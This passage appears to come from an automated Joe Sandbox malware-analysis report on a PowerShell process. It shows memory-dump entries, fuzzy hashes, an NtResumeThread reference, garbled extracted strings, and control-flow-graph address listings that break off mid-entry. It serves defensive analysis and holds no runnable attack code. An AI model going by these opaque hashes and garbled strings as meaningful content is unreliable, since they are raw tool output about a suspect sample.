                                                                                                                                                                                                                                                        • Instruction ID: 83727ac19a33fae9a48a9b7846bc3d446e80acc7f58a5de1cb51a090d21e925a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ff153c0901ad12ce252155b5ac2b98a9d8c0fdd04c0f4bdb27d9b786ed899b4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 811138B1D003088FDB14DFAAD4847AEFBF4EB88210F60842ED019B3200C734A945CFA4
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • NtResumeThread.NTDLL(?,?), ref: 06C9F7C6
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193802182.0000000006C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C90000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c90000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ResumeThread
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                                                                                                                                        • Opcode ID: 787d146e02155f654e0303207554ec265cbee3375bb74e6b0f5c914d67dff156
                                                                                                                                                                                                                                                        • Instruction ID: d1a65f2e0a6ba2fb4e998ec1a874e9b8589b225602894fd0c2c047708eedbcc9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 787d146e02155f654e0303207554ec265cbee3375bb74e6b0f5c914d67dff156
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C51106B1D003088FDB10DFAAD48479EFBF4EB89220F54842ED419A7200C778A9458FA4
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57162315970.0000000000E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E00000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_e00000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 1dca54a73c12f1696b1b9c884fab7734bf64feb4bc27e511fc94222d7530f595
                                                                                                                                                                                                                                                        • Instruction ID: 915e40d6792cb2377828441d2de5414a3b4df2dff544f9030567fae1a7c754c0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1dca54a73c12f1696b1b9c884fab7734bf64feb4bc27e511fc94222d7530f595
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09C26A34A05249DFDB05CFA8D494A9DBBF1FF49314F24819AE844AB3A2C735ED85CB90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57160980799.0000000000930000.00000040.00000800.00020000.00000000.sdmp, Offset: 00930000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_930000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a506f91b7b6a532a2c655879bec3dd4749207cf56e9214ff17d4de320897810b
                                                                                                                                                                                                                                                        • Instruction ID: 1ae868dfac8e2493afbd06d186e87839233cba6d2a5dc1ce821b6de29e0e628c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a506f91b7b6a532a2c655879bec3dd4749207cf56e9214ff17d4de320897810b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E52C2B4A046288FCB64DF28C994B9AB7F2FB49301F1085D9E94DA7355DB30AE81CF51
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4dc7e318a3d9cfb2d3f94d26c29d609d608dbc454cd2094a698c7427683236ae
                                                                                                                                                                                                                                                        • Instruction ID: 9152ae80c8661b7531a433ae3eeedeac55be0b45b74cc7566281e85109d42820
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4dc7e318a3d9cfb2d3f94d26c29d609d608dbc454cd2094a698c7427683236ae
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23D1F874E14218CFEB64DFAAC885BADBBF2FB49301F1080A9D409A7355DB705985CF91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: e8fa98bd018f0d68667f326c962b47ce4725653ceb35471cd640da8014c24178
                                                                                                                                                                                                                                                        • Instruction ID: c04211281987317132019ad61f6ae4153a10f4a3f8dc3dd95bfe732aa72bae93
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e8fa98bd018f0d68667f326c962b47ce4725653ceb35471cd640da8014c24178
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69D10774E14218CFEB64DFA9C885BAEBBF2FB49301F2080A9D409A7355DB705985CF91
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8e9eb914319d1c50583b03bda9b7ad929a4f957472b1d14c2eefd47a56fcd215
                                                                                                                                                                                                                                                        • Instruction ID: c66166dc6cba6cd4f0dc9ae2b6c02dbd866d7369b73e255438479092b92a4d0d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e9eb914319d1c50583b03bda9b7ad929a4f957472b1d14c2eefd47a56fcd215
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9FC14C70D61318CFEB64CFAAC944B9DBBF2BF49344F1490A9E409A7251DB705985CF82
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 03fb1c09136b8ee5c656b67fe9306b2310b5d77eff1fa909d5884cfbe7f80169
                                                                                                                                                                                                                                                        • Instruction ID: 8a4b3136cd74aa04ebcef188380b3e3a404b8fb352c5bbcf2c49b143bf8701b5
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03fb1c09136b8ee5c656b67fe9306b2310b5d77eff1fa909d5884cfbe7f80169
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94B1FB70D55218CFDB64CFAAD888BDDBBF2BB49348F1090A9E409A7251DB709946CF41
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: c06eb73588e242ee9e56a11682b834d405bdee7f5fb1dce5e2c41bddf671d505
                                                                                                                                                                                                                                                        • Instruction ID: 4942d6c43eb9b1ca50fd5c089cd8a5361bd34034eb01231de177982f3f63bdb4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c06eb73588e242ee9e56a11682b834d405bdee7f5fb1dce5e2c41bddf671d505
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0B13A70E65318CFEB64CF6AC944BEDBBF2BB49344F1490A9E409A7250DB705985CF82
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 3c468a17a4241e42eb1c315c3aa23c067c4b41d332a9771c4c28044a06e44b74
                                                                                                                                                                                                                                                        • Instruction ID: 897f9d2c9f623e8117c35a422aae55c1f77fea229c3664ea08e7612c804d323e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c468a17a4241e42eb1c315c3aa23c067c4b41d332a9771c4c28044a06e44b74
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EFA11970D61318CFEBA4CFAAC584B9DBBF2BF45344F1490A9E409A7250DB749985CF82
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 4fbba52fe4877e3f1bbe25bcd6556af4bedae182758d438b53d80b25d7a519bf
                                                                                                                                                                                                                                                        • Instruction ID: 832ccc7441bd14e5bdda75d3e290202febe28922077da1c99732d7cf7bd81e89
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4fbba52fe4877e3f1bbe25bcd6556af4bedae182758d438b53d80b25d7a519bf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 72A13A70D61318CFEBA4CF6AC584B9DBBF2BF49344F1490A9E409A7254DB709985CF82
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b723cb0d4a4d7ffd9711acf7ec799400dfab8a406178f5bf4dcb5ae4685d7479
                                                                                                                                                                                                                                                        • Instruction ID: 21ec4dbbda272f78057586b3643700e5775414eed6ed3b3690f520e5dd40edc6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b723cb0d4a4d7ffd9711acf7ec799400dfab8a406178f5bf4dcb5ae4685d7479
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 36A10970D61318CFEBA4CF6AC584B9DBBF2BF45344F1490A9E409A7250DB749985CF82
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 241a21a23ea9f9c3291995bdacb7befab7f1780f0bf354f23fedad74649e75bd
                                                                                                                                                                                                                                                        • Instruction ID: dba1ae65b602f997f2fc6435649b99a3ad3656146454323081789b8e560c0df3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 241a21a23ea9f9c3291995bdacb7befab7f1780f0bf354f23fedad74649e75bd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A911674E1421CCFDBA4DFA9D445BADBBF2EB49301F109069E40AA7395DB305986CFA0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 60fac9d867ad48c0d2a5fc7c4cee50f3e540900cd417b2646d894df8f00862eb
                                                                                                                                                                                                                                                        • Instruction ID: ac9514896c0430af0dcce999ec4510baee4f40e34db79a55e6e0d7727ee567d2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60fac9d867ad48c0d2a5fc7c4cee50f3e540900cd417b2646d894df8f00862eb
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F912874E14218CFDBA4DFA9D444BADBBF2FB49305F108169E40AA7395DB305986CF90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2a24742e95b99029528d4a983d47e68b0d251644507826b06bb136f0c2efcc5f
                                                                                                                                                                                                                                                        • Instruction ID: 4dd9d65a68c98a6b610c8a91b42f5fb5dd525b51913f9ffcba3211abee7d7023
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a24742e95b99029528d4a983d47e68b0d251644507826b06bb136f0c2efcc5f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66A13970D61318CFEBA4CF6AC584B9DBBF2BF45344F1490A9E409A7254DB709985CF82
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193561998.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c70000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: eb85649af62ae321332c6efe69ec149af15796c302c6aaa372a7a4fac346ceea
                                                                                                                                                                                                                                                        • Instruction ID: 7fa7ed16a9d5f7f761df1371d68107ca5cd9574895635ee739443a7d9afb8632
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb85649af62ae321332c6efe69ec149af15796c302c6aaa372a7a4fac346ceea
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A81E574E1420CCFDBA4DFAAD445BADBBF2EB49301F109069E40AA7355DB309986CF90
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6b88fba6cfc0d01583f29b90962d941adfe3ca9426a63c8b1d36e66ab64653aa
                                                                                                                                                                                                                                                        • Instruction ID: 647c2ea42a3ed09cb462fd396b250a7f6de69330eb066260ebedb1e0955842f9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b88fba6cfc0d01583f29b90962d941adfe3ca9426a63c8b1d36e66ab64653aa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E91E870E55218CFDB64CFAAD488B9DBBF2BF48348F2490A9E409A7351D7709986CF41
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57194378565.0000000006E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E60000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6e60000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a0ace21e9d4e741b73fa4d9e64db25ff82181a456ddd98412c42ccba975170bc
                                                                                                                                                                                                                                                        • Instruction ID: e32ff091c2ac3a5da5e4eecd8831102f5d73d23f3c761861c72c4aef5db92031
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a0ace21e9d4e741b73fa4d9e64db25ff82181a456ddd98412c42ccba975170bc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80911870D61318CFEBA4CF6AC584B9DBBF2BF45344F1490A9E409A7250DB745985CF82
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57193473310.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_6c60000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 0Jj$0Jj$LRj$LRj$G,j$G,j$G,j$G,j$G,j$G,j$G,j$G,j$G,j$G,j
                                                                                                                                                                                                                                                        • API String ID: 0-532016892
                                                                                                                                                                                                                                                        • Opcode ID: 87152c0e9aa949a00ff5c41bf8752bca702cdfccd741e6681af2b13621ddcbfe
                                                                                                                                                                                                                                                        • Instruction ID: cfaf118624b793e51da92729ad767bb7bd9101b0382e61228a04ab88878b9a53
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87152c0e9aa949a00ff5c41bf8752bca702cdfccd741e6681af2b13621ddcbfe
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07722735B00208DFDB95DF6AC88476ABBF6AFC5210FB4806EE405CB291DB71D941CBA5

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 312 7315858-7315881 313 7315887-731588c 312->313 314 731627f-731628e 312->314 315 73158a4-73158ae 313->315 316 731588e-7315894 313->316 315->314 319 73158b4-73158b9 315->319 317 7315896 316->317 318 7315898-73158a2 316->318 317->315 318->315 321 73158d1-73158db 319->321 322 73158bb-73158c1 319->322 321->314 326 73158e1-73158e6 321->326 324 73158c3 322->324 325 73158c5-73158cf 322->325 324->321 325->321 327 73158e8-73158ee 326->327 328 73158fe 326->328 331 73158f0 327->331 332 73158f2-73158fc 327->332 330 7315901-731590b 328->330 330->314 333 7315911-7315916 330->333 331->328 332->328 334 7315918-731591e 333->334 335 731592e-731594d 333->335 337 7315920 334->337 338 7315922-731592c 334->338 339 731597c-7315986 335->339 340 731594f-7315979 335->340 337->335 338->335 339->314 341 731598c-7315991 339->341 340->339 344 7315993-7315999 341->344 345 73159a9-73159d1 341->345 346 731599b 344->346 347 731599d-73159a7 344->347 345->314 350 73159d7-73159de 345->350 346->345 347->345 352 73159e0-73159e6 350->352 353 73159f6-7315a42 350->353 354 73159e8 352->354 355 73159ea-73159f4 352->355 361 7316263-731626f 353->361 362 7315a48-7315a68 353->362 354->353 355->353 365 7315a6b-7315a77 362->365 366 7315a80-7315a9b 365->366 367 7315a79 365->367 370 7315ac4-7315ace 366->370 371 7315a9d-7315abc 366->371 367->366 368 7315da3-7315dbe 367->368 369 7315c66-7315c81 367->369 372 7315dc0-7315ddf 368->372 373 7315de7-7315df1 368->373 376 7315c83-7315ca2 369->376 377 7315caa-7315cd3 369->377 374 7316051-731608b 370->374 375 7315ad4-7315ad9 370->375 371->370 372->373 373->374 378 7315df7-7315dfc 373->378 374->365 439 7316090-7316162 374->439 380 7315af1-7315b00 375->380 381 7315adb-7315ae1 375->381 376->377 377->374 396 7315cd9-7315cde 377->396 382 7315e14-7315e23 378->382 383 7315dfe-7315e04 378->383 380->374 389 7315b06-7315b11 380->389 387 7315ae3 381->387 388 7315ae5-7315aef 381->388 382->374 395 7315e29-7315e34 382->395 393 7315e06 383->393 394 7315e08-7315e12 383->394 387->380 388->380 391 7315b13-7315b19 389->391 392 7315b29-7315b38 389->392 397 7315b1b 391->397 398 7315b1d-7315b27 391->398 392->374 399 7315b3e-7315b45 392->399 393->382 394->382 400 7315e36-7315e3c 395->400 401 7315e4c-7315e77 395->401 402 7315ce0-7315ce6 396->402 403 7315cf6-7315cff 396->403 397->392 398->392 406 7315b47-7315b4d 399->406 407 7315b5d-7315bb7 399->407 408 7315e40-7315e4a 400->408 409 7315e3e 400->409 401->374 424 7315e7d-7315e84 401->424 410 7315ce8 402->410 411 7315cea-7315cf4 402->411 403->374 412 7315d05-7315d0c 403->412 416 7315b51-7315b5b 406->416 417 7315b4f 406->417 407->374 445 7315bbd-7315c5f 407->445 408->401 409->401 410->403 411->403 419 7315d24-7315d67 412->419 420 7315d0e-7315d14 412->420 416->407 417->407 451 7315d69-7315d7b 419->451 452 7315d7d-7315d80 419->452 425 7315d16 420->425 426 7315d18-7315d22 420->426 429 7315e86-7315e8c 424->429 430 7315e9c-7315ef1 424->430 425->419 426->419 433 7315e90-7315e9a 429->433 434 7315e8e 429->434 430->439 459 7315ef7-7315f0b 430->459 433->430 434->430 446 7316164-7316183 439->446 447 731618b-73161b4 439->447 445->369 446->447 447->314 457 73161ba-73161bf 447->457 458 7315d83-7315d9c 451->458 452->458 461 73161c1-73161c7 457->461 462 73161d7-73161e0 457->462 458->368 464 7315f34-7315f3e 459->464 465 7315f0d-7315f2c 459->465 467 73161c9 461->467 468 73161cb-73161d5 461->468 462->314 469 73161e6-73161ed 462->469 470 7316015-731604f 464->470 471 7315f44-7315f49 464->471 465->464 467->462 468->462 472 7316205-7316248 469->472 473 73161ef-73161f5 469->473 470->439 477 7315f61-7315f70 471->477 478 7315f4b-7315f51 471->478 505 731624a-7316259 472->505 506 731625e 472->506 479 73161f7 473->479 480 73161f9-7316203 473->480 477->470 481 7315f76-7315f7d 477->481 484 7315f53 478->484 485 7315f55-7315f5f 478->485 479->472 480->472 486 7315f95-7316013 481->486 487 7315f7f-7315f85 481->487 484->477 485->477 486->439 490 7315f87 487->490 491 7315f89-7315f93 487->491 490->486 491->486 505->330 506->330
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000006.00000002.57196989941.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7310000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: +j$ +j$ +j$P0*j$P0*j$\}'j$\}'j$G,j$G,j$G,j$G,j$G,j$G,j
                                                                                                                                                                                                                                                        • API String ID: 0-3666320904
                                                                                                                                                                                                                                                        • Opcode ID: 434966da1df018582fa255b17c7818c1663de761136b9010ca55db97fe1e06a5
                                                                                                                                                                                                                                                        • Instruction ID: b4f5964e0b6e7ff61b25c8183ec4886fbc15461885822bb669c7c23d5ea5b533
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 434966da1df018582fa255b17c7818c1663de761136b9010ca55db97fe1e06a5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 985259B0A00309CFEB58DB58C454A6ABBB2AFC9314F24C169D91D9F755CB72EC52CB81

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 512 6c63167-6c6317a 513 6c63180-6c63204 512->513 514 6c63bec-6c63c35 512->514 526 6c63206-6c6322b 513->526 527 6c63233-6c632b0 513->527 528 6c627b6-6c627da 514->528 529 6c627af 514->529 526->527 549 6c632b2-6c632d7 527->549 550 6c632df-6c632ec 527->550 533 6c627dc-6c62801 528->533 534 6c62809-6c62869 528->534 529->528 532 6c62870-6c62894 529->532 535 6c62896-6c628bb 532->535 536 6c628c3-6c628d0 532->536 533->534 534->532 535->536 536->514 540 6c628d6-6c62904 536->540 540->514 545 6c6290a-6c62938 540->545 545->514 552 6c6293e-6c6296c 545->552 549->550 550->514 551 6c632f2-6c63340 550->551 551->514 561 6c63346-6c63362 551->561 552->514 557 6c62972-6c62a4f 552->557 577 6c62d15-6c62d39 557->577 578 6c62a55-6c62a6f 557->578 561->514 565 6c63368-6c633a5 561->565 565->514 571 6c633ab-6c633e9 565->571 571->514 576 6c633ef-6c634b6 571->576 576->514 608 6c634bc-6c6350c 576->608 579 6c62d3b-6c62d60 577->579 580 6c62d68-6c62e7e 577->580 581 6c62a71-6c62a96 578->581 582 6c62a9e-6c62aab 578->582 579->580 628 6c62e84-6c62e9e 580->628 629 6c630e1-6c6310f 580->629 581->582 584 6c62ab1-6c62af5 582->584 585 6c62ccc-6c62d10 582->585 584->585 596 6c62afb-6c62b1b 584->596 585->577 596->585 602 6c62b21-6c62b54 596->602 602->585 613 6c62b5a-6c62bba 602->613 608->514 620 6c63512-6c6356e 608->620 613->585 623 6c62bc0-6c62c6e 613->623 636 6c63573-6c635ba 620->636 623->585 655 6c62c70-6c62cca 623->655 634 6c62ea0-6c62eac 628->634 635 6c62ec8 628->635 649 6c63114-6c63164 629->649 637 6c62eb6-6c62ebc 634->637 638 6c62eae-6c62eb4 634->638 639 6c62ece-6c62f1c 635->639 647 6c635bc-6c635e1 636->647 648 6c635e9-6c6361e 636->648 642 6c62ec6 637->642 638->642 639->629 660 6c62f22-6c62f37 639->660 642->639 647->648 648->514 656 6c63624-6c63648 648->656 649->514 655->577 656->514 664 6c6364e-6c636aa 656->664 666 6c62f51-6c62f86 660->666 667 6c62f39-6c62f3f 660->667 684 6c636cf-6c636d5 664->684 685 6c636ac-6c636c1 664->685 666->629 679 6c62f8c-6c62fac 666->679 668 6c62f43-6c62f4f 667->668 669 6c62f41 667->669 668->666 669->666 679->629 682 6c62fb2-6c63096 679->682 682->629 711 6c63098-6c630df 682->711 687 6c636db-6c63722 684->687 685->687 692 6c63724-6c63749 687->692 693 6c63751-6c6375e 687->693 692->693 693->514 694 6c63764-6c63792 693->694 694->514 699 6c63798-6c637c6 694->699 699->514 702 6c637cc-6c637fa 699->702 702->514 706 6c63800-6c638dd 702->706 722 6c638e3-6c638fd 706->722 723 6c63c3a-6c63d42 706->723 711->649 725 6c638ff-6c63924 722->725 726 6c6392c-6c63939 722->726 731 6c63d44-6c63d69 723->731 732 6c63d71-6c63da6 723->732 725->726 728 6c63ba1-6c63bea 726->728 729 6c6393f-6c63983 726->729 728->514 728->723 729->728 741 